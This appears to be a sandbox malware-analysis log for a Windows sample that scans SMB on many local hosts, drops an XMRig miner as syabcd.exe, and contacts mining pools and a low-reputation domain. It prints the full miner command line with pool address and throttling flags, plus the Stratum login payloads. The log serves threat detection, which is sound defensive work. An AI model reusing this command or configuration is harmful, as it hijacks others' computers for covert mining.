Source: global traffic	TCP traffic: 192.168.2.58:80
Source: global traffic	TCP traffic: 192.168.2.173:80
Source: global traffic	TCP traffic: 192.168.2.174:80
Source: global traffic	TCP traffic: 192.168.2.171:80
Source: global traffic	TCP traffic: 192.168.2.172:80
Source: global traffic	TCP traffic: 192.168.2.177:80
Source: global traffic	TCP traffic: 192.168.2.178:80
Source: global traffic	TCP traffic: 192.168.2.51:80
Source: global traffic	TCP traffic: 192.168.2.175:80
Source: global traffic	TCP traffic: 192.168.2.50:80
Source: global traffic	TCP traffic: 192.168.2.176:80

Connects to many different private IPs via SMB (likely to spread or exploit)

Source: global traffic	TCP traffic: 192.168.2.148:445
Source: global traffic	TCP traffic: 192.168.2.149:445
Source: global traffic	TCP traffic: 192.168.2.146:445
Source: global traffic	TCP traffic: 192.168.2.147:445
Source: global traffic	TCP traffic: 192.168.2.140:445
Source: global traffic	TCP traffic: 192.168.2.141:445
Source: global traffic	TCP traffic: 192.168.2.144:445
Source: global traffic	TCP traffic: 192.168.2.145:445
Source: global traffic	TCP traffic: 192.168.2.142:445
Source: global traffic	TCP traffic: 192.168.2.143:445
Source: global traffic	TCP traffic: 192.168.2.159:445
Source: global traffic	TCP traffic: 192.168.2.157:445
Source: global traffic	TCP traffic: 192.168.2.158:445
Source: global traffic	TCP traffic: 192.168.2.151:445
Source: global traffic	TCP traffic: 192.168.2.152:445
Source: global traffic	TCP traffic: 192.168.2.150:445
Source: global traffic	TCP traffic: 192.168.2.155:445
Source: global traffic	TCP traffic: 192.168.2.156:445
Source: global traffic	TCP traffic: 192.168.2.153:445
Source: global traffic	TCP traffic: 192.168.2.154:445
Source: global traffic	TCP traffic: 192.168.2.126:445
Source: global traffic	TCP traffic: 192.168.2.247:445
Source: global traffic	TCP traffic: 192.168.2.127:445
Source: global traffic	TCP traffic: 192.168.2.248:445
Source: global traffic	TCP traffic: 192.168.2.124:445
Source: global traffic	TCP traffic: 192.168.2.245:445
Source: global traffic	TCP traffic: 192.168.2.125:445
Source: global traffic	TCP traffic: 192.168.2.246:445
Source: global traffic	TCP traffic: 192.168.2.128:445
Source: global traffic	TCP traffic: 192.168.2.249:445
Source: global traffic	TCP traffic: 192.168.2.129:445
Source: global traffic	TCP traffic: 192.168.2.240:445
Source: global traffic	TCP traffic: 192.168.2.122:445
Source: global traffic	TCP traffic: 192.168.2.243:445
Source: global traffic	TCP traffic: 192.168.2.123:445
Source: global traffic	TCP traffic: 192.168.2.244:445
Source: global traffic	TCP traffic: 192.168.2.120:445
Source: global traffic	TCP traffic: 192.168.2.241:445
Source: global traffic	TCP traffic: 192.168.2.121:445
Source: global traffic	TCP traffic: 192.168.2.242:445
Source: global traffic	TCP traffic: 192.168.2.97:445
Source: global traffic	TCP traffic: 192.168.2.137:445
Source: global traffic	TCP traffic: 192.168.2.96:445
Source: global traffic	TCP traffic: 192.168.2.138:445
Source: global traffic	TCP traffic: 192.168.2.99:445
Source: global traffic	TCP traffic: 192.168.2.135:445
Source: global traffic	TCP traffic: 192.168.2.98:445
Source: global traffic	TCP traffic: 192.168.2.136:445
Source: global traffic	TCP traffic: 192.168.2.139:445
Source: global traffic	TCP traffic: 192.168.2.250:445
Source: global traffic	TCP traffic: 192.168.2.130:445
Source: global traffic	TCP traffic: 192.168.2.251:445
Source: global traffic	TCP traffic: 192.168.2.91:445
Source: global traffic	TCP traffic: 192.168.2.90:445
Source: global traffic	TCP traffic: 192.168.2.93:445
Source: global traffic	TCP traffic: 192.168.2.133:445
Source: global traffic	TCP traffic: 192.168.2.254:445
Source: global traffic	TCP traffic: 192.168.2.92:445
Source: global traffic	TCP traffic: 192.168.2.134:445
Source: global traffic	TCP traffic: 192.168.2.95:445
Source: global traffic	TCP traffic: 192.168.2.131:445
Source: global traffic	TCP traffic: 192.168.2.252:445
Source: global traffic	TCP traffic: 192.168.2.94:445
Source: global traffic	TCP traffic: 192.168.2.132:445
Source: global traffic	TCP traffic: 192.168.2.253:445
Source: global traffic	TCP traffic: 192.168.2.104:445
Source: global traffic	TCP traffic: 192.168.2.225:445
Source: global traffic	TCP traffic: 192.168.2.105:445
Source: global traffic	TCP traffic: 192.168.2.226:445
Source: global traffic	TCP traffic: 192.168.2.102:445
Source: global traffic	TCP traffic: 192.168.2.223:445
Source: global traffic	TCP traffic: 192.168.2.103:445
Source: global traffic	TCP traffic: 192.168.2.224:445
Source: global traffic	TCP traffic: 192.168.2.108:445
Source: global traffic	TCP traffic: 192.168.2.229:445
Source: global traffic	TCP traffic: 192.168.2.109:445
Source: global traffic	TCP traffic: 192.168.2.106:445
Source: global traffic	TCP traffic: 192.168.2.227:445
Source: global traffic	TCP traffic: 192.168.2.107:445
Source: global traffic	TCP traffic: 192.168.2.228:445
Source: global traffic	TCP traffic: 192.168.2.100:445
Source: global traffic	TCP traffic: 192.168.2.221:445
Source: global traffic	TCP traffic: 192.168.2.101:445
Source: global traffic	TCP traffic: 192.168.2.222:445
Source: global traffic	TCP traffic: 192.168.2.220:445
Source: global traffic	TCP traffic: 192.168.2.115:445
Source: global traffic	TCP traffic: 192.168.2.236:445
Source: global traffic	TCP traffic: 192.168.2.116:445
Source: global traffic	TCP traffic: 192.168.2.237:445
Source: global traffic	TCP traffic: 192.168.2.113:445
Source: global traffic	TCP traffic: 192.168.2.234:445
Source: global traffic	TCP traffic: 192.168.2.114:445
Source: global traffic	TCP traffic: 192.168.2.235:445
Source: global traffic	TCP traffic: 192.168.2.119:445
Source: global traffic	TCP traffic: 192.168.2.117:445
Source: global traffic	TCP traffic: 192.168.2.238:445
Source: global traffic	TCP traffic: 192.168.2.118:445
Source: global traffic	TCP traffic: 192.168.2.239:445
Source: global traffic	TCP traffic: 192.168.2.111:445
Source: global traffic	TCP traffic: 192.168.2.232:445
Source: global traffic	TCP traffic: 192.168.2.112:445
Source: global traffic	TCP traffic: 192.168.2.233:445
Source: global traffic	TCP traffic: 192.168.2.230:445
Source: global traffic	TCP traffic: 192.168.2.110:445
Source: global traffic	TCP traffic: 192.168.2.231:445
Source: global traffic	TCP traffic: 192.168.2.203:445
Source: global traffic	TCP traffic: 192.168.2.204:445
Source: global traffic	TCP traffic: 192.168.2.201:445
Source: global traffic	TCP traffic: 192.168.2.202:445
Source: global traffic	TCP traffic: 192.168.2.207:445
Source: global traffic	TCP traffic: 192.168.2.208:445
Source: global traffic	TCP traffic: 192.168.2.205:445
Source: global traffic	TCP traffic: 192.168.2.206:445
Source: global traffic	TCP traffic: 192.168.2.200:445
Source: global traffic	TCP traffic: 192.168.2.209:445
Source: global traffic	TCP traffic: 192.168.2.214:445
Source: global traffic	TCP traffic: 192.168.2.215:445
Source: global traffic	TCP traffic: 192.168.2.212:445
Source: global traffic	TCP traffic: 192.168.2.213:445
Source: global traffic	TCP traffic: 192.168.2.218:445
Source: global traffic	TCP traffic: 192.168.2.219:445
Source: global traffic	TCP traffic: 192.168.2.216:445
Source: global traffic	TCP traffic: 192.168.2.217:445
Source: global traffic	TCP traffic: 192.168.2.210:445
Source: global traffic	TCP traffic: 192.168.2.211:445
Source: global traffic	TCP traffic: 192.168.2.39:445
Source: global traffic	TCP traffic: 192.168.2.38:445
Source: global traffic	TCP traffic: 192.168.2.42:445
Source: global traffic	TCP traffic: 192.168.2.41:445
Source: global traffic	TCP traffic: 192.168.2.44:445
Source: global traffic	TCP traffic: 192.168.2.43:445
Source: global traffic	TCP traffic: 192.168.2.46:445
Source: global traffic	TCP traffic: 192.168.2.45:445
Source: global traffic	TCP traffic: 192.168.2.48:445
Source: global traffic	TCP traffic: 192.168.2.47:445
Source: global traffic	TCP traffic: 192.168.2.40:445
Source: global traffic	TCP traffic: 192.168.2.28:445
Source: global traffic	TCP traffic: 192.168.2.27:445
Source: global traffic	TCP traffic: 192.168.2.29:445
Source: global traffic	TCP traffic: 192.168.2.31:445
Source: global traffic	TCP traffic: 192.168.2.30:445
Source: global traffic	TCP traffic: 192.168.2.33:445
Source: global traffic	TCP traffic: 192.168.2.32:445
Source: global traffic	TCP traffic: 192.168.2.35:445
Source: global traffic	TCP traffic: 192.168.2.34:445
Source: global traffic	TCP traffic: 192.168.2.37:445
Source: global traffic	TCP traffic: 192.168.2.36:445
Source: global traffic	TCP traffic: 192.168.2.17:445
Source: global traffic	TCP traffic: 192.168.2.16:445
Source: global traffic	TCP traffic: 192.168.2.19:445
Source: global traffic	TCP traffic: 192.168.2.18:445
Source: global traffic	TCP traffic: 192.168.2.20:445
Source: global traffic	TCP traffic: 192.168.2.22:445
Source: global traffic	TCP traffic: 192.168.2.21:445
Source: global traffic	TCP traffic: 192.168.2.24:445
Source: global traffic	TCP traffic: 192.168.2.23:445
Source: global traffic	TCP traffic: 192.168.2.26:445
Source: global traffic	TCP traffic: 192.168.2.25:445
Source: global traffic	TCP traffic: 192.168.2.11:445
Source: global traffic	TCP traffic: 192.168.2.10:445
Source: global traffic	TCP traffic: 192.168.2.13:445
Source: global traffic	TCP traffic: 192.168.2.12:445
Source: global traffic	TCP traffic: 192.168.2.15:445
Source: global traffic	TCP traffic: 192.168.2.14:445
Source: global traffic	TCP traffic: 192.168.2.0:445
Source: global traffic	TCP traffic: 192.168.2.2:445
Source: global traffic	TCP traffic: 192.168.2.1:445
Source: global traffic	TCP traffic: 192.168.2.180:445
Source: global traffic	TCP traffic: 192.168.2.181:445
Source: global traffic	TCP traffic: 192.168.2.8:445
Source: global traffic	TCP traffic: 192.168.2.7:445
Source: global traffic	TCP traffic: 192.168.2.9:445
Source: global traffic	TCP traffic: 192.168.2.4:445
Source: global traffic	TCP traffic: 192.168.2.3:445
Source: global traffic	TCP traffic: 192.168.2.6:445
Source: global traffic	TCP traffic: 192.168.2.5:445
Source: global traffic	TCP traffic: 192.168.2.86:445
Source: global traffic	TCP traffic: 192.168.2.85:445
Source: global traffic	TCP traffic: 192.168.2.88:445
Source: global traffic	TCP traffic: 192.168.2.87:445
Source: global traffic	TCP traffic: 192.168.2.89:445
Source: global traffic	TCP traffic: 192.168.2.184:445
Source: global traffic	TCP traffic: 192.168.2.185:445
Source: global traffic	TCP traffic: 192.168.2.80:445
Source: global traffic	TCP traffic: 192.168.2.182:445
Source: global traffic	TCP traffic: 192.168.2.183:445
Source: global traffic	TCP traffic: 192.168.2.82:445
Source: global traffic	TCP traffic: 192.168.2.188:445
Source: global traffic	TCP traffic: 192.168.2.81:445
Source: global traffic	TCP traffic: 192.168.2.189:445
Source: global traffic	TCP traffic: 192.168.2.84:445
Source: global traffic	TCP traffic: 192.168.2.186:445
Source: global traffic	TCP traffic: 192.168.2.83:445
Source: global traffic	TCP traffic: 192.168.2.187:445
Source: global traffic	TCP traffic: 192.168.2.191:445
Source: global traffic	TCP traffic: 192.168.2.192:445
Source: global traffic	TCP traffic: 192.168.2.190:445
Source: global traffic	TCP traffic: 192.168.2.75:445
Source: global traffic	TCP traffic: 192.168.2.74:445
Source: global traffic	TCP traffic: 192.168.2.77:445
Source: global traffic	TCP traffic: 192.168.2.76:445
Source: global traffic	TCP traffic: 192.168.2.79:445
Source: global traffic	TCP traffic: 192.168.2.78:445
Source: global traffic	TCP traffic: 192.168.2.195:445
Source: global traffic	TCP traffic: 192.168.2.196:445
Source: global traffic	TCP traffic: 192.168.2.193:445
Source: global traffic	TCP traffic: 192.168.2.194:445
Source: global traffic	TCP traffic: 192.168.2.71:445
Source: global traffic	TCP traffic: 192.168.2.199:445
Source: global traffic	TCP traffic: 192.168.2.70:445
Source: global traffic	TCP traffic: 192.168.2.73:445
Source: global traffic	TCP traffic: 192.168.2.197:445
Source: global traffic	TCP traffic: 192.168.2.72:445
Source: global traffic	TCP traffic: 192.168.2.198:445
Source: global traffic	TCP traffic: 192.168.2.64:445
Source: global traffic	TCP traffic: 192.168.2.63:445
Source: global traffic	TCP traffic: 192.168.2.66:445
Source: global traffic	TCP traffic: 192.168.2.168:445
Source: global traffic	TCP traffic: 192.168.2.65:445
Source: global traffic	TCP traffic: 192.168.2.169:445
Source: global traffic	TCP traffic: 192.168.2.68:445
Source: global traffic	TCP traffic: 192.168.2.67:445
Source: global traffic	TCP traffic: 192.168.2.69:445
Source: global traffic	TCP traffic: 192.168.2.162:445
Source: global traffic	TCP traffic: 192.168.2.163:445
Source: global traffic	TCP traffic: 192.168.2.160:445
Source: global traffic	TCP traffic: 192.168.2.161:445
Source: global traffic	TCP traffic: 192.168.2.60:445
Source: global traffic	TCP traffic: 192.168.2.166:445
Source: global traffic	TCP traffic: 192.168.2.167:445
Source: global traffic	TCP traffic: 192.168.2.62:445
Source: global traffic	TCP traffic: 192.168.2.164:445
Source: global traffic	TCP traffic: 192.168.2.61:445
Source: global traffic	TCP traffic: 192.168.2.165:445
Source: global traffic	TCP traffic: 192.168.2.170:445
Source: global traffic	TCP traffic: 192.168.2.49:445
Source: global traffic	TCP traffic: 192.168.2.53:445
Source: global traffic	TCP traffic: 192.168.2.52:445
Source: global traffic	TCP traffic: 192.168.2.55:445
Source: global traffic	TCP traffic: 192.168.2.179:445
Source: global traffic	TCP traffic: 192.168.2.54:445
Source: global traffic	TCP traffic: 192.168.2.57:445
Source: global traffic	TCP traffic: 192.168.2.56:445
Source: global traffic	TCP traffic: 192.168.2.59:445
Source: global traffic	TCP traffic: 192.168.2.58:445
Source: global traffic	TCP traffic: 192.168.2.173:445
Source: global traffic	TCP traffic: 192.168.2.174:445
Source: global traffic	TCP traffic: 192.168.2.171:445
Source: global traffic	TCP traffic: 192.168.2.172:445
Source: global traffic	TCP traffic: 192.168.2.177:445
Source: global traffic	TCP traffic: 192.168.2.178:445
Source: global traffic	TCP traffic: 192.168.2.51:445
Source: global traffic	TCP traffic: 192.168.2.175:445
Source: global traffic	TCP traffic: 192.168.2.50:445
Source: global traffic	TCP traffic: 192.168.2.176:445

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 89.2.syabcd.exe.7ff66fae0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000059.00000002.2062381455.00007FF66FAE1000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: syabcd.exe PID: 6400, type: MEMORYSTR

Detected Stratum mining protocol

Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 195.201.97.156:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 159.69.83.232:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 159.69.83.232:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 159.69.83.232:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:50906 -> 195.201.97.156:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:51525 -> 159.69.83.232:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:51532 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:51533 -> 195.201.97.156:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:51534 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:51537 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:51539 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:51543 -> 195.201.97.156:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:51544 -> 195.201.97.156:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:51545 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:51648 -> 159.69.83.232:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.
Source: global traffic	TCP traffic: 192.168.2.5:52086 -> 88.198.117.174:19999 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"sn","pass":"1","agent":"xmrig/5.5.0 (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2015","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/gpu","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","rx/0","rx/wow","rx/loki","rx/arq","rx/sfx"]}}.

Found strings related to Crypto-Mining

Source: x00zm3KVwb.exe, 00000000.00000003.2149210207.000000000118C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -KonC
Source: syabcd.exe, 00000059.00000002.2062381455.00007FF66FAE1000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: :,cryptonight
Source: x00zm3KVwb.exe, 00000000.00000003.2149210207.000000000118C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -KonC
Source: syabcd.exe, 00000059.00000002.2062381455.00007FF66FAE1000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: syabcd.exe, 00000059.00000002.2062381455.00007FF66FAE1000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: syabcd.exe, 00000059.00000002.2062381455.00007FF66FAE1000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: XMRig 5.5.0

Source: x00zm3KVwb.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:51911 version: TLS 1.2

Source: x00zm3KVwb.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SMB.exe.0.dr

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz
Source:	DNS query: nishabii.xyz

Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 218.244.58.70:9011
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 195.201.97.156:19999
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 159.69.83.232:19999
Source: global traffic	TCP traffic: 192.168.2.5:51532 -> 88.198.117.174:19999

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: CHINA169-BJChinaUnicomBeijingProvinceNetworkCN CHINA169-BJChinaUnicomBeijingProvinceNetworkCN

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
